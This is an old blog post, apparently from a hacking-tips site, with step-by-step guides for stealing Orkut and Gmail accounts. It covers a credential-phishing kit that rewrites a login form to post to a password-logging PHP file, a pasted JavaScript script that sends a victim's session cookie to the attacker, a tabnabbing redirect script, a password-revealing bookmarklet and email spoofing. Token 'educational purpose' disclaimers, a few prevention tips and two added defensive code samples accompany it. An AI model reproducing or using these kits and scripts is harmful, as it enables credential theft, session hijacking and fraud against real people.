Friday, 29 June 2012

How to hack with phishing


What Is Phishing?
Phishing is the act of sending an email to a user while falsely claiming to be an established, legitimate enterprise, in an attempt to scam the user into surrendering private information that will be used for identity theft.
The email directs the user to visit a web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The web site, however, is bogus and set up only to steal the user’s information.
Phishing attacks are trying to steal your money!
Phishing scams could be:
- Emails inviting you to join a social group and asking you to log in with your username and password.
- Emails saying that your bank account is locked and asking you to sign in to your account to unlock it.
- Emails containing some information of interest to you and asking you to log in to your account.
- Any email carrying a link to click and asking you to log in.
The Phishing Hack Starts Now. this Hack example is for orkut account.
Step 1:- Download the necessary files Which you will need during the phishing attack. This file is a .rar file which
includes 3 files named hackingtech.php, hackingtech.txt & ServiceLogin.html and also consist a folder in which
there are support files for ServerLogin.html
Step 2:- Unrar the download pack named orkuthacking.rar any where on your computer.
Step 3:- Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php" and "hackingtech.txt" in any
web hosting site..
You will have to create a sub-folder in the web hosting site's directory. Name that folder as "ServiceLogin_files" and
upload the 2 images of the pack in that folder. (it must support PHPs.)
>>> You can choose one of the following web hosting Company to upload the Folder.
http://www.freeweb7.com
http://Ripway.com{Recommended}
http://www.110mb.com
http://www.phpnet.us
“You can Download the pack From Here: http://www.hackingtech.co.tv/orkuthacking.rar “.
Step 4:- Your work is over now. Just give the link ofurfake page to the victim and whenever he/she will type the password
and sign in . Password will be stored in "hackingtech.txt"...
General form of the fake page's link
Code:
http://urwebhostingsite/urusername/ServiceLogin.htm
Step 5:- Now you can send this link to victim by any mode but the best is my email send a fake email in the name of orkut
the your orkut account has a security problem pl. click on th link below and re-activate your account. we will see how to
send fake email within short time.
Now If You want to create your own phishing page the follow the steps below.
Step 1:-Open the website whose phishing page you want create.
Step 2:-Then right click any where on the page and select view source.
Step 3:-Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the code.
Step 4:-The paste this code in a new notepad window and save it as ServerLogin.htm
Step 5:- Open "ServiceLogin.htm" with notepad and the search for word "action". [press ctrl+f to find the word]
Step 6:-You will find like this action=" https://www.google.com/accounts/ServiceLoginAuth "
Step 7:-Replace the link between this red quote with the link you got by uploading the file hackingtech.php and it should
be like this action=" http://www.yourhostingcompany.com/username/hackingtech.php "
Step 8:-Now Save this as serverlogin.htm
Step 9:-Now Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php" and "hackingtech.txt" and
serverlogin.htm file in any web hosting site you want.
Step 10:-You are done just go to the link of the file serverlogin.htm given by your hosting company .
Step 11:- Now you can send this link to victim by any mode but the best is my email send a fake email in the name of
orkut the your orkut account has a security problem pl. click on th link below and re-activate your account. we will see
how to send fake email within short time.
Step 12:-To see the passwords that you have hacked just go to the link of hackingtech.txt given by your hosting company .
Prevention Against Phishing:
- Read every email carefully and check whether the sender is genuine.
- Look at the link carefully before clicking.
- Always check the URL in the browser before signing in to your account.
- Always log in to your accounts by opening the trusted website yourself, not by clicking a link in another website or an email.
“Do not use this hack trick in any criminal activities like phishing bank websites and please do not
destroy any ones account this is only for educational purpose”.
 How To View Hidden Password behind ****
Step 1.First of all open up the webpage on which you wanna show the hidden passwords.
Step 2. Then in the username there must be the name and in the password there must be ********
Step 3.Now to see the password which is behind the ******** Just copy and paste the following JavaScript into the
address bar of the browser and you are done.
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
Step 4. After copying and pasting the JavaScript given above press the enter key and hidden passwords will be shown to
you.
“You can use This script when some one has checked the remember me button in the login form
of any website and to reveal password from that saved astrisk or encrypted password”.
“Do not use this hack trick in any criminal activities and please do not destroy any ones account
this is for educational purpose only”.
Hack Orkut Accounts by Cookie Stealing
This article below explains the method to hack orkut account by stealing orkut account cookies. Hacking orkut accounts
has become much popular and hence i have added this article which will help you in hacking your friend’s orkut account.
Just ask the victim to copy the script in address bar and then you will be able to login/access /hack his orkut account.
Note: My purpose is only to make u aware of what’s happening around and not to teach u hacking orkut account, Gmail
or any account in any sort!!.
Procedure for hacking orkut account by stealing orkut cookies from Mozilla Firefox to hack Gmail or orkut is given below.
"Hacking orkut account or Gmail” by "stealing orkut account cookies”:
The post explains how one can steal cookies to hack orkut account or Gmail account. No password cracking method
required.
Steps to hack Gmail or orkut account password by stealing orkut cookies:-
Step 1. Firstly you need have Mozilla firefox.
Step2. Cookie editor plugin for Mozilla firefox.
Step 3. You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you have to receive orkut cookies to
one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two
Gmail(Orkut) accounts.
Cookie Script:
javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?
Action.submit’;nobody.submit()
How to use orkut cookies script?
Step 1. Replace your number "UserId.value=33444211
 How to Replace your Number
Step 1. Go to your Orkut album
Step 2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
Step 3. Now replace your value with the value in the java script.
“Download cookie editor plugin for Mozilla firefox from: https://addons.mozilla.org/en-US/firefox/addon/573
Your script will look like -
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;nobody.submit()
Step 2. Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter.
Step 3. You’ll get his orkut account cookie in your scrap book.
Step 4. After getting a orkut account cookie go to your orkut Home page , Then click on Tools tab and then go to cookie
editor plugin( Tools–> Cookie editor)
Step 5. click filter/refresh.look for ‘orkut_state’ cookie. just double click it and replace the orkut_state part with your
victim’s Script
put ur eight digit number in the place of (33444211).
Thats it your done with.
Logout of your orkut and login again and you’ll be in your victims Homepage.
Step 6. So remember guys…if you are having orkut account or having any other account….never use any suspicious script
to prevent anyone from hacking/accessing your orkut account.
I hope you have learned how to hack orkut accounts using cookie stealing. Just the script can be used to hack orkut
accounts and then access victim’s orkut account. Enjoy hacking orkut.
“Do not use this hack trick in any criminal activities and please do not destroy any ones account
this is for educational purpose only”.
“You can also use this attack for many other sites like yahoo but you will need some other scripts
for that but nothing is impossible so use google and search the script for other sites for self
practice”.
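The script above works only because the session cookie is visible to page script through document.cookie. The following is an added example for site owners, not part of the original post: it audits Set-Cookie header values and reports session cookies that lack the HttpOnly flag (which hides a cookie from document.cookie) or the Secure flag. The function name and the sample header values are constructed; only the cookie name orkut_state comes from the article.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie header values. 'orkut_state' is the cookie name the
# article mentions; the values and the 'lang' cookie are made up.
WEAK = ["orkut_state=ORKUTPREF-constructed; Path=/", "lang=en; Path=/"]
HARDENED = ["orkut_state=ORKUTPREF-constructed; Path=/; Secure; HttpOnly; SameSite=Lax"]

# Flag name as written in the header -> key used by http.cookies.Morsel
REQUIRED_FLAGS = (("HttpOnly", "httponly"), ("Secure", "secure"))

def audit_session_cookies(set_cookie_values, session_names):
    """Map each session cookie to the protective flags it is missing.

    A cookie without HttpOnly can be read by any script running in the page,
    including one a user is talked into pasting into the address bar.
    """
    report = {}
    for raw in set_cookie_values:
        jar = SimpleCookie()
        jar.load(raw)
        for name, morsel in jar.items():
            if name not in session_names:
                continue  # preference cookies and the like are out of scope
            missing = [flag for flag, key in REQUIRED_FLAGS if not morsel[key]]
            if missing:
                report[name] = missing
    return report
```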
 Tab Napping A New Phishing Attack

Traditional phishing attacks are reasonably easy to avoid: just don’t click links in suspicious e-mails (or, for the really paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious way to launch an attack by hijacking your unattended browser tabs.
The attack works by first detecting that the tab the page is in does not have focus. Then the attacking script can change the tab favicon and title before loading a new site, say a fake version of gmail or orkut, in the background.
Even scarier, the attack can parse through your history to find sites you actually visit and impersonate them.
Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As Raskin writes, “as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is malleable and moldable and the user will most likely simply think they left *the* tab open.”
The only clue that you’re being tricked is that the URL will be wrong.
The Script Used is as Below.-
<a> open this in a tab of your browser and wait for 10 seconds and see after you come back but leave this page and go
to other tab to see this magic.</a>
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
//else do nothing
}
function pollActivity(){
if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft ||
yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) {
//other browsers
initRedirect(); //reset polling scroll position
}
} document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
To See The Demo Of this Attack visit: http://www.hackingtech.co.tv/tabnapping.html
Replace the URL highlighted here with your URL where you want the victim to redirect.
Use This Script in the Page and then the page will redirect after 10 sec when the user if not on the particular tab.
“Do not use this hack trick in any criminal activities and please do not destroy any ones account
this is for educational purpose only”.
How to Check The email is original or Not
First of all, let us see how the email system works over the internet.
The email is sent on the internet as shown in the picture below.
Here the sender, abc@server1.com, is sending a mail to xyz@server2.in. The sender types the mail and clicks the send button, and the mail goes to SERVER1.com. SERVER1.com forwards the mail over the internet, the internet looks up the server for the xyz@server2.in email ID and sends the mail to SERVER2.in. SERVER2.in then searches for xyz@server2.in in its own database and forwards the mail to xyz@server2.in. When the XYZ user logs in to their account, they see an email in their inbox from abc@server1.com.
Now How To send the fake mail
To send fake mail we need to bypass both abc@server1.com and SERVER1.com and send an email directly over the internet.
For that we will use a .php script, as PHP has a function mail() which can send email to anyone without SERVER1.com, delivering the mail directly to SERVER2.in. SERVER2.in will then search for xyz@server2.in in its own database and forward the mail to xyz@server2.in, and when the XYZ user logs in to their account they will see an email in their inbox which is from abc@server1.com.
But the email was not actually sent by abc@server1.com to xyz@server2.in, so it is a fake mail.
SEND FAKE MAILS FROM HACKING TECH
Fill Up the form on Hacking Tech fake mailer page. For form visit http://www.hackingtech.co.tv/index/0-93
Now how to check when you receive such a mail.
Step 1:- First of all, open the mail.
Step 2:- Click on the downward arrow near the reply button and click on "Show original".
Now check the "Received: from" field on the page that opens and see who has sent you the email. Here billgates@microsoft.com is the sender, so the "Received: from" field must contain microsoft.com and not anything else.
This was a fake mail: the field contained outgoing.x10hosting.com, and since there is no microsoft.com there, the mail is fake.
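The same check can be run over the raw text from "Show original". The following is an added example, not part of the original post: it compares the domain in From: with the hosts named in the "from" clause of each Received header. The function names, the sample message, the mx.server2.in hostname and the 192.0.2.25 address are constructed; the two domains are the ones used above.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample in the shape the article describes: From: claims
# microsoft.com, but the only relay named is outgoing.x10hosting.com.
SAMPLE = """\
Received: from outgoing.x10hosting.com (outgoing.x10hosting.com [192.0.2.25])
\tby mx.server2.in with ESMTP id abc123; Fri, 29 Jun 2012 10:00:00 +0000
From: Bill Gates <billgates@microsoft.com>
To: xyz@server2.in
Subject: hello

body
"""

_FROM_HOST = re.compile(r"^\s*from\s+([A-Za-z0-9.-]+)", re.I)

def relay_hosts(msg):
    """Hostnames from the 'from' clause of each Received header, newest first."""
    hosts = []
    for value in msg.get_all("Received", []):
        m = _FROM_HOST.match(value)
        if m:
            hosts.append(m.group(1).lower().rstrip("."))
    return hosts

def check_sender(raw):
    """Compare the From: domain with the relays named in Received headers."""
    msg = message_from_string(raw)
    domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    hosts = relay_hosts(msg)
    # A relay is consistent if it is the domain itself or a host under it.
    matches = [h for h in hosts if h == domain or h.endswith("." + domain)]
    return {"from_domain": domain, "relays": hosts, "consistent": bool(matches)}
```

Treat an inconsistent result as a signal rather than proof: legitimate senders often relay through third-party hosts, and every Received line below the one added by your own mail server is written by the sending side and can be forged.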
“Do not send fake mails for criminal activities from hackingtech fake mailer as they are tracking
your IP address and Can back track you for any illegal activities performed by you and so please do
not destroy any ones account, this is for educational purpose only”.
